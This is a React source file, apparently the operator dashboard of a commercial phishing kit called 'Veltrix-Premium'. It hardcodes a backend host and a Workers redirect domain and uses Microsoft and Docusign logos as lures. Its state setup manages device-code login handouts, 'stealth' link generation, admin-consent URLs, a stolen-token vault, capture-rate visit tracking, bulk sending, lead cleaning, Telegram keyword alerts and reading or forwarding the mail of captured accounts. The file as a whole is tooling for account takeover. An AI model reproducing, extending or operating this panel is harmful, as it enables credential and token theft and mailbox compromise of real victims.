import React, { useEffect, useMemo, useRef, useState, useCallback } from "react";

const API = process.env.REACT_APP_API_BASE || "https://api.179vp.top";
const REFRESH_INTERVAL_MS = 60000;
const DEVICE_POLL_INTERVAL_MS = 10000;
const KEEP_ALIVE_INTERVAL_MS = 600000;
const DASHBOARD_UI_VERSION = "Goodluck!";
const PLAIN_LANDING_TEMPLATE_ID = "__plain__";

const DEFAULT_LOGOS = [
  { name: "Microsoft", url: "https://res.cloudinary.com/xoufprho/image/upload/v1789687664/microsoft_logo.png" },
  { name: "OneDrive", url: "https://res.cloudinary.com/xoufprho/image/upload/v1789687739/microsoft_onedrive_logo.png" },
  { name: "SharePoint", url: "https://res.cloudinary.com/xoufprho/image/upload/v1789688091/microsoft_sharepoint_logo.jpg" },
  { name: "Microsoft Teams", url: "https://res.cloudinary.com/xoufprho/image/upload/v1789688117/microsoft_teams_logo.jpg" },
  { name: "Docusign", url: "https://res.cloudinary.com/xoufprho/image/upload/v1789688146/microsoft_docusign_logo.png" },
];
const DEFAULT_LOGO_URL = DEFAULT_LOGOS[0].url;

const DEFAULT_LANDING_TEMPLATE_ID = "office";
const DEFAULT_INSTRUCTION_THEME_ID = "Office Login";
const DEFAULT_EXIT_PAGE_ID = "empty word document";
const DEFAULT_REDIRECT_MODE = "worker";
const DEFAULT_WORKER_BASE_URL = "https://doc-share-38ce.02026cloudshare036portalcon0tinue.workers.dev";
const DEFAULT_AZURE_PROFILE_NAME = "Microsoft Office";


const BRAND_NAME = "Veltrix-Premium";
const SIDEBAR_LOGO_URL = "https://res.cloudinary.com/dpmjcauzg/image/upload/t_ddd/V_tdrjas.png";
const LOGIN_LOGO_URL = "https://res.cloudinary.com/dpmjcauzg/image/upload/t_ddd/V_tdrjas.png";
const BROWSER_FAVICON_URL = "https://res.cloudinary.com/dpmjcauzg/image/upload/t_ddd/V_tdrjas.png";
const URL_GENERATOR_LOGO_URL = "https://res.cloudinary.com/xoufprho/image/upload/v1789687664/microsoft_logo.png";

// -------- ICS Generator --------
function generateIcsFile(event) {
  const { subject, description, location, start_time, end_time, to } = event;
  const start = new Date(start_time);
  const end = new Date(end_time);
  const uid = Date.now() + Math.random().toString(36).substr(2, 9) + '@example.com';

  const escapeIcsText = (text) => {
    return String(text || '').replace(/\\/g, '\\\\').replace(/;/g, '\\;').replace(/,/g, '\\,').replace(/\n/g, '\\n');
  };

  const icsContent = [
    'BEGIN:VCALENDAR',
    'VERSION:2.0',
    'PRODID:-//Your Company//Your App//EN',
    'BEGIN:VEVENT',
    `UID:${uid}`,
    `DTSTAMP:${start.toISOString().replace(/[-:]/g, '').split('.')[0]}Z`,
    `DTSTART:${start.toISOString().replace(/[-:]/g, '').split('.')[0]}Z`,
    `DTEND:${end.toISOString().replace(/[-:]/g, '').split('.')[0]}Z`,
    `SUMMARY:${escapeIcsText(subject || 'Meeting')}`,
    `LOCATION:${escapeIcsText(location || '')}`,
    `DESCRIPTION:${escapeIcsText(description || '')}`,
    `ATTENDEE:mailto:${escapeIcsText(to || '')}`,
    'END:VEVENT',
    'END:VCALENDAR'
  ].join('\n');

  return new Blob([icsContent], { type: 'text/calendar;charset=utf-8' });
}

// -------- Helper functions --------
function escapeHtml(value = "") {
  return String(value)
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#039;");
}

function plainTextToHtml(value = "") {
  return escapeHtml(value).replace(/\n/g, "<br />");
}

function htmlToPlainText(value = "") {
  const div = document.createElement("div");
  div.innerHTML = value || "";
  return div.innerText || div.textContent || "";
}

function prepareReadableEmailHtml(value = "", isDarkMode = false) {
  const raw = String(value || "");
  if (!raw.trim()) return "";
  const parser = new DOMParser();
  const doc = parser.parseFromString(raw, "text/html");

  const readableColor = isDarkMode ? "#f8fafc" : "#111827";
  const mutedColor = isDarkMode ? "#cbd5e1" : "#374151";
  const linkColor = isDarkMode ? "#93c5fd" : "#2563eb";
  const panelBg = isDarkMode ? "#0f172a" : "#ffffff";
  const borderColor = isDarkMode ? "#334155" : "#e5e7eb";

  doc.querySelectorAll("body, div, p, span, td, th, li, font, section, article").forEach((node) => {
    const currentStyle = node.getAttribute("style") || "";
    const cleanedStyle = currentStyle
      .replace(/color\s*:\s*[^;]+;?/gi, "")
      .replace(/background-color\s*:\s*transparent;?/gi, "");
    node.setAttribute(
      "style",
      `${cleanedStyle}; color:${readableColor}; max-width:100%; overflow-wrap:anywhere; word-break:break-word;`
    );
  });

  doc.querySelectorAll("a").forEach((node) => {
    const currentStyle = node.getAttribute("style") || "";
    node.setAttribute(
      "style",
      `${currentStyle}; color:${linkColor}; overflow-wrap:anywhere; word-break:break-word;`
    );
    node.setAttribute("target", "_blank");
    node.setAttribute("rel", "noreferrer");
  });

  doc.querySelectorAll("img").forEach((node) => {
    const currentStyle = node.getAttribute("style") || "";
    node.setAttribute(
      "style",
      `${currentStyle}; max-width:100%; height:auto; display:block; border-radius:8px;`
    );
    node.setAttribute("loading", "lazy");
    if (!node.getAttribute("alt")) node.setAttribute("alt", "email image");
  });

  doc.querySelectorAll("table").forEach((node) => {
    const currentStyle = node.getAttribute("style") || "";
    node.setAttribute(
      "style",
      `${currentStyle}; max-width:100%; width:100%; table-layout:auto; border-collapse:collapse; color:${readableColor};`
    );
  });

  doc.querySelectorAll("pre, code").forEach((node) => {
    const currentStyle = node.getAttribute("style") || "";
    node.setAttribute(
      "style",
      `${currentStyle}; max-width:100%; white-space:pre-wrap; overflow-wrap:anywhere; color:${readableColor}; background:${panelBg}; border:1px solid ${borderColor}; border-radius:8px; padding:8px;`
    );
  });

  doc.querySelectorAll("*").forEach((node) => {
    const style = node.getAttribute("style") || "";
    if (/color\s*:\s*(#000|black|rgb\(0,\s*0,\s*0\))/i.test(style) && isDarkMode) {
      node.setAttribute("style", `${style}; color:${readableColor};`);
    }
    if (/color\s*:\s*(#fff|white|rgb\(255,\s*255,\s*255\))/i.test(style) && !isDarkMode) {
      node.setAttribute("style", `${style}; color:${mutedColor};`);
    }
  });

  return doc.body.innerHTML || raw;
}

function highlightText(text, query) {
  if (!query || !text) return text;
  const escaped = query.replace(/[.*+?^${}()|[\]\\]/g, '\\$&');
  const regex = new RegExp(`(${escaped})`, 'gi');
  return text.replace(regex, '<mark>$1</mark>');
}

// -------- Toasts --------
function useToast() {
  const [toasts, setToasts] = useState([]);

  const addToast = useCallback((message, type = "info", duration = 4000) => {
    const id = Date.now() + Math.random();
    setToasts((prev) => [...prev, { id, message, type }]);
    setTimeout(() => {
      setToasts((prev) => prev.filter((t) => t.id !== id));
    }, duration);
  }, []);

  const removeToast = useCallback((id) => {
    setToasts((prev) => prev.filter((t) => t.id !== id));
  }, []);

  return { toasts, addToast, removeToast };
}

function ToastContainer({ toasts, removeToast }) {
  if (!toasts.length) return null;
  return (
    <div style={toastStyles.container}>
      {toasts.map((t) => (
        <div
          key={t.id}
          style={{
            ...toastStyles.toast,
            background:
              t.type === "success"
                ? "#ecfdf3"
                : t.type === "error"
                  ? "#fff1f2"
                  : t.type === "warning"
                    ? "#fffbeb"
                    : "#f0f5ff",
            borderColor:
              t.type === "success"
                ? "#86efac"
                : t.type === "error"
                  ? "#fda4af"
                  : t.type === "warning"
                    ? "#fde68a"
                    : "#c7d7fe",
            color:
              t.type === "success"
                ? "#15803d"
                : t.type === "error"
                  ? "#be123c"
                  : t.type === "warning"
                    ? "#92400e"
                    : "#1d4ed8",
          }}
        >
          <span style={{ flex: 1, fontWeight: 700, fontSize: 13 }}>
            {t.type === "success"
              ? "✓ "
              : t.type === "error"
                ? "✕ "
                : t.type === "warning"
                  ? "⚠ "
                  : "ℹ "}
            {t.message}
          </span>
          <button onClick={() => removeToast(t.id)} style={toastStyles.close}>
            ×
          </button>
        </div>
      ))}
    </div>
  );
}

const toastStyles = {
  container: {
    position: "fixed",
    bottom: 24,
    right: 24,
    zIndex: 9999,
    display: "flex",
    flexDirection: "column",
    gap: 10,
    maxWidth: 380,
  },
  toast: {
    display: "flex",
    alignItems: "center",
    gap: 10,
    padding: "12px 16px",
    borderRadius: 14,
    border: "1px solid",
    boxShadow: "0 8px 24px rgba(16,24,40,0.12)",
    animation: "slideIn 0.2s ease",
  },
  close: {
    background: "none",
    border: "none",
    cursor: "pointer",
    fontSize: 18,
    lineHeight: 1,
    opacity: 0.6,
    padding: 0,
    color: "inherit",
  },
};

// -------- Modal --------
function Modal({ open, onClose, title, children }) {
  if (!open) return null;
  return (
    <div style={modalStyles.overlay} onClick={onClose}>
      <div style={modalStyles.box} onClick={(e) => e.stopPropagation()}>
        <div style={modalStyles.header}>
          <div style={modalStyles.title}>{title}</div>
          <button style={modalStyles.close} onClick={onClose}>×</button>
        </div>
        <div style={modalStyles.body}>{children}</div>
      </div>
    </div>
  );
}

const modalStyles = {
  overlay: {
    position: "fixed",
    inset: 0,
    background: "rgba(16,24,40,0.45)",
    zIndex: 1000,
    display: "flex",
    alignItems: "center",
    justifyContent: "center",
    padding: 24,
  },
  box: {
    background: "#fff",
    borderRadius: 24,
    boxShadow: "0 24px 80px rgba(16,24,40,0.18)",
    width: "100%",
    maxWidth: 560,
    maxHeight: "85vh",
    overflow: "auto",
  },
  header: {
    display: "flex",
    justifyContent: "space-between",
    alignItems: "center",
    padding: "20px 24px 16px",
    borderBottom: "1px solid #eaecf0",
  },
  title: {
    fontSize: 18,
    fontWeight: 900,
    color: "#101828",
  },
  close: {
    background: "none",
    border: "none",
    fontSize: 24,
    cursor: "pointer",
    color: "#667085",
    lineHeight: 1,
    padding: 0,
  },
  body: {
    padding: "20px 24px 24px",
    display: "grid",
    gap: 14,
  },
};

// -------- CopyButton --------
function CopyButton({ value, label = "Copy", toast }) {
  const [copied, setCopied] = useState(false);
  const [pop, setPop] = useState(false);

  async function handleCopy() {
    try {
      await navigator.clipboard.writeText(String(value || ""));
      setCopied(true);
      setPop(true);
      toast && toast("Copied!", "success");
      setTimeout(() => setPop(false), 220);
      setTimeout(() => setCopied(false), 1800);
    } catch {
      toast && toast("Copy failed", "error");
    }
  }

  return (
    <button
      type="button"
      aria-live="polite"
      title={copied ? "Copied!" : label}
      style={{
        display: "inline-flex",
        alignItems: "center",
        justifyContent: "center",
        gap: 6,
        padding: "7px 14px",
        borderRadius: 8,
        border: copied ? "1px solid #12b76a" : "1px solid #d0d5dd",
        background: copied ? "#16a34a" : "#fff",
        color: copied ? "#fff" : "#101828",
        fontSize: 13,
        fontWeight: 700,
        cursor: "pointer",
        transform: pop ? "scale(1.08)" : "scale(1)",
        boxShadow: copied ? "0 0 0 4px rgba(18,183,106,0.22)" : "none",
        transition:
          "transform 0.15s ease, box-shadow 0.2s ease, background 0.2s ease, border 0.2s ease, color 0.2s ease",
      }}
      onClick={handleCopy}
    >
      <span
        style={{
          display: "inline-flex",
          alignItems: "center",
          gap: 6,
          transition: "opacity 0.15s ease",
        }}
      >
        {copied ? "✓ Copied!" : label}
      </span>
    </button>
  );
}

// -------- StatusDot --------
function StatusDot({ active, label }) {
  return (
    <div style={{ display: "flex", alignItems: "center", gap: 8 }}>
      <div
        style={{
          width: 8,
          height: 8,
          borderRadius: "50%",
          background: active ? "#12b76a" : "#d0d5dd",
          boxShadow: active ? "0 0 0 3px rgba(18,183,106,0.2)" : "none",
        }}
      />
      <span
        style={{
          fontSize: 13,
          fontWeight: 700,
          color: active ? "#15803d" : "#667085",
        }}
      >
        {label}
      </span>
    </div>
  );
}

// -------- MiniBarChart --------
function MiniBarChart({ data, color = "#2e90fa" }) {
  if (!data || !data.length) return null;
  const max = Math.max(...data.map((d) => d.count), 1);
  return (
    <div style={{ display: "flex", alignItems: "flex-end", gap: 4, height: 48 }}>
      {data.slice(0, 8).map((d, i) => (
        <div
          key={i}
          style={{
            flex: 1,
            background: color,
            opacity: 0.7 + (d.count / max) * 0.3,
            borderRadius: "4px 4px 0 0",
            height: `${Math.max((d.count / max) * 100, 8)}%`,
            position: "relative",
          }}
          title={`${d.country || d.device || d.browser}: ${d.count}`}
        />
      ))}
    </div>
  );
}

// -------- MEMOIZED EMAIL BODY --------
const EmailBody = React.memo(({ email, userId, attachments, isDarkMode, searchQuery, fetchWithAuth }) => {
  const [renderedBody, setRenderedBody] = useState("");
  const [loadingInline, setLoadingInline] = useState(false);

  const fetchAttachmentContent = useCallback(async (messageId, attachmentId) => {
    try {
      const url = `${API}/email/${encodeURIComponent(messageId)}/attachments/${encodeURIComponent(attachmentId)}?user_id=${encodeURIComponent(userId)}&download=true`;
      const res = await fetchWithAuth(url);
      if (!res.ok) throw new Error("Failed to fetch attachment");
      const blob = await res.blob();
      return new Promise((resolve) => {
        const reader = new FileReader();
        reader.onload = () => resolve(reader.result);
        reader.onerror = () => resolve(null);
        reader.readAsDataURL(blob);
      });
    } catch {
      return null;
    }
  }, [userId, fetchWithAuth]);

  useEffect(() => {
    if (!email?.id || !userId) {
      setRenderedBody("");
      return;
    }

    let initialBody = email?.body || email?.bodyHtml || email?.bodyPreview || "<p>No body available.</p>";

    const bodyTypeLower = String(email?.bodyType || email?.body_type || "").toLowerCase();
    const looksLikeHtml = /<\/?[a-zA-Z][\s\S]*?>/i.test(initialBody);
    const treatAsPlainText =
      bodyTypeLower === "text" ||
      bodyTypeLower === "plain" ||
      (!looksLikeHtml && String(initialBody || "").trim().length > 0);

    if (treatAsPlainText) {
      initialBody = plainTextToHtml(initialBody);
    }

    if (!initialBody.includes("cid:")) {
      setRenderedBody(initialBody);
      return;
    }

    const inlineAttachments = (attachments || []).filter(
      (att) => att.isInline && att.contentId && att.contentType?.startsWith("image/")
    );

    if (inlineAttachments.length === 0) {
      setRenderedBody(initialBody);
      return;
    }

    setLoadingInline(true);

    const fetchPromises = inlineAttachments.map(async (att) => {
      const dataUrl = await fetchAttachmentContent(email.id, att.id);
      return { contentId: att.contentId, dataUrl };
    });

    Promise.all(fetchPromises)
      .then((results) => {
        let updatedBody = initialBody;
        results.forEach(({ contentId, dataUrl }) => {
          if (dataUrl) {
            const cidVariants = [contentId, `<${contentId}>`];
            cidVariants.forEach((cid) => {
              const escapedCid = cid.replace(/[.*+?^${}()|[\]\\]/g, '\\$&');
              const regex = new RegExp(`cid:${escapedCid}`, 'gi');
              updatedBody = updatedBody.replace(regex, dataUrl);
            });
          }
        });
        setRenderedBody(updatedBody);
        setLoadingInline(false);
      })
      .catch(() => {
        setRenderedBody(initialBody);
        setLoadingInline(false);
      });
  }, [
    email?.id,
    email?.body,
    email?.bodyHtml,
    email?.bodyPreview,
    email?.bodyType,
    userId,
    attachments,
    fetchAttachmentContent,
  ]);

  const finalHtml = useMemo(() => {
    if (loadingInline) return "<div>Loading images...</div>";
    let html = renderedBody || "<p>No body available.</p>";
    if (searchQuery) {
      html = highlightText(html, searchQuery);
    }
    return prepareReadableEmailHtml(html, isDarkMode);
  }, [renderedBody, loadingInline, searchQuery, isDarkMode]);

  const readerBodyLargeStyle = {
    fontSize: 14.5,
    color: "#172033",
    background: isDarkMode ? "#0b1220" : "#ffffff",
    border: isDarkMode ? "1px solid #334155" : "1px solid #eef2f7",
    borderRadius: 16,
    padding: "22px 24px",
    lineHeight: 1.85,
    width: "100%",
    maxWidth: "100%",
    minWidth: 0,
    overflowX: "hidden",
    overflowWrap: "anywhere",
    wordBreak: "break-word",
    boxSizing: "border-box",
    boxShadow: isDarkMode ? "0 18px 50px rgba(0,0,0,0.28)" : "none",
    userSelect: "text",
    whiteSpace: "normal",
  };

  return (
    <div
      className="mail-reader-body"
      style={readerBodyLargeStyle}
      translate="yes"
      dangerouslySetInnerHTML={{ __html: finalHtml }}
    />
  );
});
// -------- MAIN APP --------
function App() {
  const { toasts, addToast, removeToast } = useToast();

  const [loading, setLoading] = useState(true);
  const [isAuthenticated, setIsAuthenticated] = useState(false);

  const [workerBaseUrl, setWorkerBaseUrl] = useState(DEFAULT_WORKER_BASE_URL);
  const [azureClientId, setAzureClientId] = useState("");
  const [azureTenant, setAzureTenant] = useState("");
  const [azureProfiles, setAzureProfiles] = useState([]);
  const [selectedProfileId, setSelectedProfileId] = useState(DEFAULT_AZURE_PROFILE_NAME);

  const [emails, setEmails] = useState([]);
  const [emailNextLink, setEmailNextLink] = useState("");
  const [emailLoadingMore, setEmailLoadingMore] = useState(false);
  const [folders, setFolders] = useState([]);
  const [folderTree, setFolderTree] = useState([]);
  const [selectedEmail, setSelectedEmail] = useState(null);
  const [selectedEmailAttachments, setSelectedEmailAttachments] = useState([]);
  const [attachmentsLoading, setAttachmentsLoading] = useState(false);
  const [showAttachmentPanel, setShowAttachmentPanel] = useState(false);
  const [showConversationPanel, setShowConversationPanel] = useState(false);
  const [selectedEmailConversation, setSelectedEmailConversation] = useState([]);
  const [conversationLoading, setConversationLoading] = useState(false);
  const [currentFolderId, setCurrentFolderId] = useState(() => {
    const saved = localStorage.getItem("currentFolderId");
    return saved || null;
  });

  const [username, setUsername] = useState("");
  const [password, setPassword] = useState("");
  const [loginLoading, setLoginLoading] = useState(false);
  const [loginOtpCode, setLoginOtpCode] = useState("");
  const [loginRequires2fa, setLoginRequires2fa] = useState(false);

  const [tempViewerUsername, setTempViewerUsername] = useState("");
  const [tempViewerPassword, setTempViewerPassword] = useState("");
  const [tempViewerLoginLoading, setTempViewerLoginLoading] = useState(false);

  const [selectedUserId, setSelectedUserId] = useState("");
  const [availableUsers, setAvailableUsers] = useState([]);
  const [customerAccounts, setCustomerAccounts] = useState([]);
  const [activeResultMailboxes, setActiveResultMailboxes] = useState([]);
  const [activeResultMailboxesLoading, setActiveResultMailboxesLoading] = useState(false);
  const [temporaryMailboxAccesses, setTemporaryMailboxAccesses] = useState([]);
  const [temporaryMailboxAccessLoading, setTemporaryMailboxAccessLoading] = useState({});
  const [customerLoading, setCustomerLoading] = useState(false);
  const [customerForm, setCustomerForm] = useState({
    email: "",
    username: "",
    full_name: "",
    company_name: "",
    password: "",
    plan: "trial_3_days",
    assigned_domain: "",
    proxy_url: "",
    notes: "",
  });
  const [customerActionLoading, setCustomerActionLoading] = useState({});

  const [microsoftConnected, setMicrosoftConnected] = useState(false);
  const [inboxConnected, setInboxConnected] = useState(false);
  const [enterpriseStatus, setEnterpriseStatus] = useState({
    tenant_hint: "",
    mode: "preview",
    consent_status: "none",
    enterprise_enabled: false,
    app_only_enabled: false,
    notes: "",
  });

  const [generatedLoginUrl, setGeneratedLoginUrl] = useState("");
  const [generatedMailConnectUrl, setGeneratedMailConnectUrl] = useState("");
  const [generatedOrgConnectUrl, setGeneratedOrgConnectUrl] = useState("");
  const [generatedOrgMailConnectUrl, setGeneratedOrgMailConnectUrl] = useState("");
  const [generatedAdminConsentUrl, setGeneratedAdminConsentUrl] = useState("");
  const [deviceSupportPageUrl, setDeviceSupportPageUrl] = useState("");
  const [freshDeviceShareUrl, setFreshDeviceShareUrl] = useState("");

  const [stealthUserId, setStealthUserId] = useState("");
  const [stealthFlowType, setStealthFlowType] = useState("user_mail");
  const [stealthGeneratedUrl, setStealthGeneratedUrl] = useState("");
  const [stealthPayloadInfo, setStealthPayloadInfo] = useState(null);
  const [stealthLoading, setStealthLoading] = useState(false);

  const [stealthModal, setStealthModal] = useState({
    open: false,
    userId: "",
    stealthUrl: "",
    supportPageUrl: "",
  });

  const [payloadInfo, setPayloadInfo] = useState(null);
  const [payloadScopes, setPayloadScopes] = useState(null);

  const [tenantHint, setTenantHint] = useState("");
  const [tenantConsents, setTenantConsents] = useState([]);
  const [enterpriseTenants, setEnterpriseTenants] = useState([]);
  const [enterpriseOrgName, setEnterpriseOrgName] = useState("");
  const [enterpriseNotes, setEnterpriseNotes] = useState("");
  const [enterpriseMode, setEnterpriseMode] = useState("enterprise_full");

  const [connectError, setConnectError] = useState("");
  const [adminConsentRequired, setAdminConsentRequired] = useState(false);
  const [blockedUserId, setBlockedUserId] = useState("");

  const [showCompose, setShowCompose] = useState(false);
  const [composeTo, setComposeTo] = useState("");
  const [composeSubject, setComposeSubject] = useState("");
  const [composeBody, setComposeBody] = useState("");
  const [composeCc, setComposeCc] = useState("");
  const [composeBcc, setComposeBcc] = useState("");
  const [composeAttachment, setComposeAttachment] = useState(null);

  const [showReplyBox, setShowReplyBox] = useState(false);
  const [replyText, setReplyText] = useState("");

  const [replyBody, setReplyBody] = useState("");
  const [replyCc, setReplyCc] = useState("");
  const [replyBcc, setReplyBcc] = useState("");
  const [replyAttachment, setReplyAttachment] = useState(null);
  const [replyBodyMode, setReplyBodyMode] = useState("text");
  const [userSignature, setUserSignature] = useState(() => localStorage.getItem("userSignature") || "");
  const replyEditorRef = useRef(null);
  const replySelection = useRef(null);
  const replyBodyRef = useRef("");
  const replySelectedRange = useRef(null);

  const [showForwardBox, setShowForwardBox] = useState(false);
  const [forwardTo, setForwardTo] = useState("");
  const [forwardCc, setForwardCc] = useState("");

  const [rules, setRules] = useState([]);
  const [ruleCondition, setRuleCondition] = useState("");
  const [ruleKeyword, setRuleKeyword] = useState("");
  const [ruleAction, setRuleAction] = useState("");
  const [ruleTargetFolder, setRuleTargetFolder] = useState("");
  const [ruleForwardTo, setRuleForwardTo] = useState("");
  const [ruleIsActive, setRuleIsActive] = useState(true);

  const [deviceCodeData, setDeviceCodeData] = useState(null);
  const [deviceFlowStatus, setDeviceFlowStatus] = useState("");
  const [devicePolling, setDevicePolling] = useState(false);
  const [autoPollingEnabled, setAutoPollingEnabled] = useState(false);
  const [deviceMailMode, setDeviceMailMode] = useState(false);

  const [deviceHandoutTitle, setDeviceHandoutTitle] = useState("Microsoft Device Login");
  const [deviceHandoutWriteup, setDeviceHandoutWriteup] = useState(
    "Please follow the steps below to continue sign-in."
  );
  const [deviceHandoutLogoUrl, setDeviceHandoutLogoUrl] = useState(DEFAULT_LOGO_URL);
  const [deviceCodeStartedAt, setDeviceCodeStartedAt] = useState(null);
  const [deviceCodeSecondsLeft, setDeviceCodeSecondsLeft] = useState(null);

  const [approvedRecipient, setApprovedRecipient] = useState("");
  const [approvedCc, setApprovedCc] = useState("");
  const [approvedBcc, setApprovedBcc] = useState("");
  const [approvedCcSeparator, setApprovedCcSeparator] = useState("auto");
  const [approvedBccSeparator, setApprovedBccSeparator] = useState("auto");
  const [approvedSubject, setApprovedSubject] = useState("");
  const [approvedBody, setApprovedBody] = useState("");
  const [approvedAttachment, setApprovedAttachment] = useState(null);
  const [approvedReplyTo, setApprovedReplyTo] = useState("");

  const [bulkRecipients, setBulkRecipients] = useState("");
  const [bulkDelaySeconds, setBulkDelaySeconds] = useState(5);
  const [bulkMaxRecipients, setBulkMaxRecipients] = useState(25);
  const [bulkBatchSize, setBulkBatchSize] = useState(10);
  const [bulkBatchPauseSeconds, setBulkBatchPauseSeconds] = useState(30);
  const [bulkRecipientsFile, setBulkRecipientsFile] = useState(null);
  const [bulkSending, setBulkSending] = useState(false);
  const [bulkSendResults, setBulkSendResults] = useState(null);
  const [recentUrls, setRecentUrls] = useState([]);

  const [leadCleanerInput, setLeadCleanerInput] = useState("");
  const [leadCleanerLoading, setLeadCleanerLoading] = useState(false);
  const [leadCleanerResults, setLeadCleanerResults] = useState(null);

  const [providerSorterInput, setProviderSorterInput] = useState("");
  const [providerSorterLoading, setProviderSorterLoading] = useState(false);

  const [backgroundJobs, setBackgroundJobs] = useState([]);

  const [appConfig, setAppConfig] = useState({
    read_only_mode: false,
    device_code_preferred: true,
    admin_consent_tenant: "common",
  });

  const [dashboardSummary, setDashboardSummary] = useState({
    saved_users_count: 0,
    connected_mailboxes_count: 0,
    stored_token_records: 0,
    token_records_count: 0,
    approved_tenants_count: 0,
    pending_tenants_count: 0,
    enterprise_enabled_count: 0,
    active_links_generated: 0,
    number_active_links_generated: 0,
    active_link_count: 0,
    active_mailbox: "",
    selected_user_id: "",
  });

  const [visits, setVisits] = useState([]);
  const [visitSummary, setVisitSummary] = useState({
    total_visits: 0,
    successful_captures: 0,
    failed_attempts: 0,
    conversion_rate: 0,
    recent_visits_24h: 0,
    country_count: 0,
    top_countries: [],
    device_breakdown: [],
    browser_breakdown: [],
  });
  const [visitsLoading, setVisitsLoading] = useState(false);
  const [visitFilter, setVisitFilter] = useState("");
  const [visitCountryFilter, setVisitCountryFilter] = useState("");
  const [visitCityFilter, setVisitCityFilter] = useState("");
  const [visitDeviceFilter, setVisitDeviceFilter] = useState("");
  const [visitBrowserFilter, setVisitBrowserFilter] = useState("");
  const [visitOutcomeFilter, setVisitOutcomeFilter] = useState("");
  const [visitIpFilter, setVisitIpFilter] = useState("");
  const [tokenVault, setTokenVault] = useState([]);
  const [tokenVaultLoading, setTokenVaultLoading] = useState(false);
  const [clientIp, setClientIp] = useState("");
  const [userGeolocation, setUserGeolocation] = useState(null);
  const [keywordListeners, setKeywordListeners] = useState([]);
  const [keywordPhrase, setKeywordPhrase] = useState("");
  const [keywordTelegramEnabled, setKeywordTelegramEnabled] = useState(true);
  const [companyWebsiteUrl, setCompanyWebsiteUrl] = useState("");
  const [deviceHandoutLogoFileName, setDeviceHandoutLogoFileName] = useState("");
  const [instructionRedirectMode, setInstructionRedirectMode] = useState(DEFAULT_REDIRECT_MODE);
  const [instructionRedirectBaseUrl, setInstructionRedirectBaseUrl] = useState(DEFAULT_WORKER_BASE_URL);
  const [customRedirectDomain, setCustomRedirectDomain] = useState("");
  const [redirectDnsSettings, setRedirectDnsSettings] = useState(null);
  const [redirectDomainLoading, setRedirectDomainLoading] = useState(false);

  // ---- NEW: Custom Domains state (Cloudflare zones + auto SSL + shared Worker binding) ----
  const [customDomains, setCustomDomains] = useState([]);
  const [domainsLoading, setDomainsLoading] = useState(false);
  const [newDomainInput, setNewDomainInput] = useState("");
  const [addingDomain, setAddingDomain] = useState(false);
  const [domainStatusLoading, setDomainStatusLoading] = useState({});
  const [domainAttachLoading, setDomainAttachLoading] = useState({});

  const [landingTemplates, setLandingTemplates] = useState([]);
  const [selectedLandingTemplateId, setSelectedLandingTemplateId] = useState(DEFAULT_LANDING_TEMPLATE_ID);
  const [templateManagerOpen, setTemplateManagerOpen] = useState(false);
  const [templateSaving, setTemplateSaving] = useState(false);
  const [templateUploading, setTemplateUploading] = useState(false);
  const [templateDeletingId, setTemplateDeletingId] = useState("");
  const [templateHtmlFile, setTemplateHtmlFile] = useState(null);
  const [templateForm, setTemplateForm] = useState({
    id: "",
    name: "",
    title: "",
    brief_writeup: "",
    additional_instructions: "",
    logo_url: "",
    website_url: "",
    service_label: "",
  });

  const [exitPages, setExitPages] = useState([]);
  const [selectedExitPageId, setSelectedExitPageId] = useState(DEFAULT_EXIT_PAGE_ID);
  const [exitManagerOpen, setExitManagerOpen] = useState(false);
  const [exitSaving, setExitSaving] = useState(false);
  const [exitDeletingId, setExitDeletingId] = useState("");
  const [exitUploading, setExitUploading] = useState(false);
  const [exitPageFile, setExitPageFile] = useState(null);
  const [exitPageForm, setExitPageForm] = useState({
    id: "",
    name: "",
    title: "",
    message: "",
    logo_url: "",
    external_url: "",
    html_content: "",
  });

  const [instructionCompanyName, setInstructionCompanyName] = useState("");
  const [instructionSenderName, setInstructionSenderName] = useState("");
  const [instructionDocumentName, setInstructionDocumentName] = useState("");
  const [instructionBrowserTitle, setInstructionBrowserTitle] = useState("");
  const [instructionDocumentLogoType, setInstructionDocumentLogoType] = useState("pdf");
  const [instructionThemeType, setInstructionThemeType] = useState("none");
  const [instructionThemeFileName, setInstructionThemeFileName] = useState("");
  const [instructionThemeImageUrl, setInstructionThemeImageUrl] = useState("");
  const [instructionThemeHtml, setInstructionThemeHtml] = useState("");
  const [instructionThemes, setInstructionThemes] = useState([]);
  const [selectedInstructionThemeId, setSelectedInstructionThemeId] = useState(DEFAULT_INSTRUCTION_THEME_ID);
  const [instructionThemeManagerOpen, setInstructionThemeManagerOpen] = useState(false);
  const [instructionThemeUploadName, setInstructionThemeUploadName] = useState("");
  const [instructionThemeUploading, setInstructionThemeUploading] = useState(false);
  const [instructionThemeDeletingId, setInstructionThemeDeletingId] = useState("");

  const clearInstructionTheme = () => {
    setInstructionThemeType("none");
    setInstructionThemeFileName("");
    setInstructionThemeImageUrl("");
    setInstructionThemeHtml("");
  };

  const handleProfileChange = (e) => {
    const selectedName = e.target.value;
    setSelectedProfileId(selectedName);
    if (selectedName === "custom") {
      return;
    }
    const profile = azureProfiles.find(p => p.name === selectedName);
    if (profile) {
      setAzureClientId(profile.client_id);
      setAzureTenant(profile.tenant || "common");
    }
  };

  const [manageUrlSections, setManageUrlSections] = useState({
    templates: false,
    exit: false,
    instructions: false,
    redirect: false,
    domains: false, // NEW
  });

  const [searchNextLink, setSearchNextLink] = useState("");
  const [searchLoadingMore, setSearchLoadingMore] = useState(false);
  const [searchQuery, setSearchQuery] = useState("");
  const [searchAttachmentsOnly, setSearchAttachmentsOnly] = useState(false);
  const [searchSortByDate, setSearchSortByDate] = useState(false);
  const [searchResults, setSearchResults] = useState([]);

  const [calendarModalOpen, setCalendarModalOpen] = useState(false);
  const [calendarInvite, setCalendarInvite] = useState({
    to: "",
    subject: "",
    description: "",
    location: "",
    start_time: "",
    end_time: "",
  });
  const [calendarSending, setCalendarSending] = useState(false);

  const [calendarAttachModal, setCalendarAttachModal] = useState({
    open: false,
    to: "",
    subject: "",
    description: "",
    location: "",
    start_time: "",
    end_time: "",
  });
  const [calendarDescription, setCalendarDescription] = useState("");
  const [calendarDescriptionMode, setCalendarDescriptionMode] = useState("wysiwyg");
  const calendarDescriptionRef = useRef(null);
  const calendarDescriptionSelectedRange = useRef(null);

  const [selectedMessageIds, setSelectedMessageIds] = useState([]);
  const [selectedMoveFolderId, setSelectedMoveFolderId] = useState("");

  const [expandedFolders, setExpandedFolders] = useState(new Set());

  const [exportSelections, setExportSelections] = useState([]);
